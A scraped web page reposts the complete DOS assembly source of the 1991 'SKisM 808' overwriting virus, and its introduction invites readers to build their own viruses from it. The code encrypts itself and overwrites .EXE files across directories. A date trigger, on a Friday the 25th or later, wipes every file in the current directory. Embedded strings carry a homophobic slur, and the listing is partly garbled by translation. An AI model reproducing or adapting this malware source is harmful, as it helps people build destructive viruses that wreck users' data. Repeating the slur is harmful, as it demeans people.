(Assembly source code) the 808 Virus

Source: Internet
Author: User
Tags filetime save file root directory

The 808 Virus

Here another virus from skism. It ' s a quick overwriting virus but

You can use the source code to write your own viruses.

------------------------------------------------------------------------------
; The SKisM 808 Virus. Created 1991 by the Smart Kids into Sick Methods.
FileName EQU used to find file name
FileAttr EQU used to find file attributes
Filedate EQU used to find file date
FILETIME EQU used to find file time
Code_start EQU 0100h; start of all. COM files
Virus_size EQU 808 TR 808
Code segment ' Code '
Assume Cs:code,ds:code,es:code
ORG Code_start
Main proc Near
JMP Virus_start
Encrypt_val DB 00h
Virus_start:
Call encrypt; Encrypt/decrypt file
JMP virus go to start of code
Encrypt
Push CX
mov bx,offset Virus_code; start encryption at data
Xor_loop:
MOV ch,[bx]; Read current byte
XOR Ch,encrypt_val; Get encryption key
mov [bx],ch switch bytes
Inc BX; Move bx up a byte
CMP Bx,offset virus_code+virus_size
; Are we do with the encryption
Jle Xor_loop, no? Keep going
Pop CX
Ret
Infectfile:
mov dx,code_start where virus starts in memory
mov bx,handle; load BX with handle
Push BX; save handle on stack
Call encrypt; Encrypt file
Pop bx; get back BX
mov cx,virus_size number of bytes to write
mov ah,40h; write to File
int 21h;
Push BX
Call encrypt, fix up the mess
Pop bx
Ret
Virus_code:
Wildcards db "*", 0 search for directory argument
Filespec DB "*. EXE ", 0; Search for EXE file argument
FILESPEC2 db "*.*", 0
RootDir db "", 0; argument for root directory
Dirdata db DUP (?); holds directory DTA
Filedata db DUP (?); Holds files DTA
Diskdtaseg DW?; Holds disk DTA segment
Diskdtaofs DW?; Holds disk DTA offset
Tempofs DW?; holds offset
Tempseg DW?; holds segment
Drivecode DB?; holds drive code
Currentdir db DUP (?); Save current directory in this
Handle DW?; holds file handle
Orig_time DW?; Holds file time
Orig_date DW?; Holds file date
Orig_attr DW?; holds file attr
Idbuffer DW 2 dup (?); Holds virus ID
Virus
mov ax,3000h; get DOS version
int 21h;
CMP al,02h is it at least 2.00?
JB Bus1 won ' t infect less than 2.00
MOV ah,2ch;
int 21h;
MOV encrypt_val,dl save M_seconds to encrypt Val
; Theres mutations possible
SETDTA:
mov dx,offset dirdata; offset of where to hold new DTA
mov ah,1ah; set DTA address
int 21h;
Newdir:
mov ah,19h; get drive Code
int 21h;
mov dl,al; save Drivecode
Inc DL; add one to DL, because functions differ
mov ah,47h; get current directory
mov si, offset currentdir; buffer to save directory in
int 21h;
mov dx,offset rootdir; move dx to change to root directory
mov ah,3bh change directory to root
int 21h;
Scandirs:
mov cx,13h; include Hidden/ro Directorys
MOV dx, offset wildcards; look for ' * '
MOV Ah,4eh;
int 21h;
CMP ax,12h No.
Jne dirloop no dirs found? Bail out
BUS1:
JMP Bus
Dirloop:
mov ah,4fh; Find Next file
int 21h;
CMP ax,12h
Je bus dirs found and roll out
ChDir
mov dx,offset dirdata+filename;point DX to Fcb-filename
mov ah,3bh change Directory
int 21h;
mov ah,2fh; get current DTA address
int 21h;
mov [Diskdtaseg],es; save Old segment
mov [DISKDTAOFS],BX; save old offset
mov dx,offset filedata; offset of where to hold new DTA
mov ah,1ah; set DTA address
int 21h;
Scandir:
MOV cx,07h;
mov dx,offset filespec;p oint dx to "*.com", 0
MOV Ah,4eh;
int 21h;
CMP ax,12h. was file found?
Jne transform
Nextexe:
mov ah,4fh; Find Next file
int 21h;
CMP ax,12h None found
Jne transform found, what we can do
mov dx,offset rootdir; move dx to change to root directory
mov ah,3bh change directory to root
int 21h;
mov ah,1ah; set DTA address
mov ds,[diskdtaseg]; restore Old segment
mov dx,[diskdtaofs]; restore old offset
int 21h;
JMP Dirloop
Bus
JMP Rollout
Transform
mov ah,2fh; temporally store DTA
int 21h;
mov [Tempseg],es; save Old segment
mov [TEMPOFS],BX; save old offset
MOV dx, offset filedata + filename
mov bx,offset filedata, save File ...
MOV ax,[bx]+filedate;d ate
MOV orig_date,ax;
MOV ax,[bx]+filetime;
MOV orig_time,ax; and
MOV ax,[bx]+fileattr;
MOV ax,4300h
int 21h
MOV orig_attr,cx
mov ax,4301h; change attributes
XOR cx,cx Clear Attributes
int 21h;
MOV ax,3d00h open file-read
int 21h;
JC fixup; error-find another file
mov handle,ax; save handle
mov ah,3fh; read from file
MOV bx,handle move handle to BX
mov cx,02h read 2 bytes
mov dx,offset idbuffer; save to buffer
int 21h;
MOV Ah,3eh close file for now
mov bx,handle; load BX with handle
int 21h;
MOV bx, idbuffer, fill bx with ID string
CMP bx,02ebh; infected?
Jne doit; same-find another file
Fixup:
mov ah,1ah; set DTA address
mov ds,[tempseg]; restore Old segment
mov dx,[tempofs]; restore old offset
int 21h;
JMP Nextexe
Doit
MOV dx, offset filedata + filename
MOV ax,3d02h Open file Read/write access
int 21h;
mov handle,ax; save handle
Call Infectfile
; mov ax,3eh; close file
; int 21h
Rollout
mov ax,5701h; restore original
MOV bx,handle;
MOV cx,orig_time time and
MOV dx,orig_date;d ate
int 21h;
MOV ax,4301h restore original attributes
MOV cx,orig_attr
MOV dx,offset filedata + filename
int 21h
; MOV Bx,handle
; mov ax,3eh; close file
; int 21h
mov ah,3bh; try to fix this
mov dx,offset RootDir; for Speed
int 21h;
mov ah,3bh change Directory
mov dx,offset Currentdir; back to original
int 21h;
MOV ah,2ah Check system date
int 21h;
CMP cx,1991 is it at least 1991?
JB Audi; no? Don ' t does it now
CMP dl,25 is it the 25th?
JB Audi; not yet? Quit
CMP al,5 is Friday?
Jne Audi; no? Quit
mov dx,offset dirdata; offset of where to hold new DTA
mov ah,1ah; set DTA address
int 21h;
MOV Ah,4eh;
MOV cx,7h;
mov dx,offset filespec2; offset *.*
Loops:
int 21h;
JC Audi; Error? Then quit
MOV ax,4301h; find all normal files
XOR Cx,cx;
int 21h;
MOV dx,offset dirdata + filename
mov ah,3ch fuck up all files in current Dir
int 21h;
JC Audi; Error? Quit
mov ah,4fh; Find Next file
JMP loops;
Audi
MOV ax,4c00h
int 21h;
; The below is just text to pad out of the virus size to 808 bytes. Don ' t
; Just change the text and claim which is your creation.
Words_ db "SKisM Rythem Stack Virus-808. Smart Kids into Sick Methods ", 0
WORDS2 DB "Dont alter this code into your own strain, Faggit.", 0
WORDS3 db "Hr/sss nycity, this are the fifth of many, many more ...", 0
WORDS4 db "You Sissys ...", 0
Main ENDP
Code ends
End Main

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.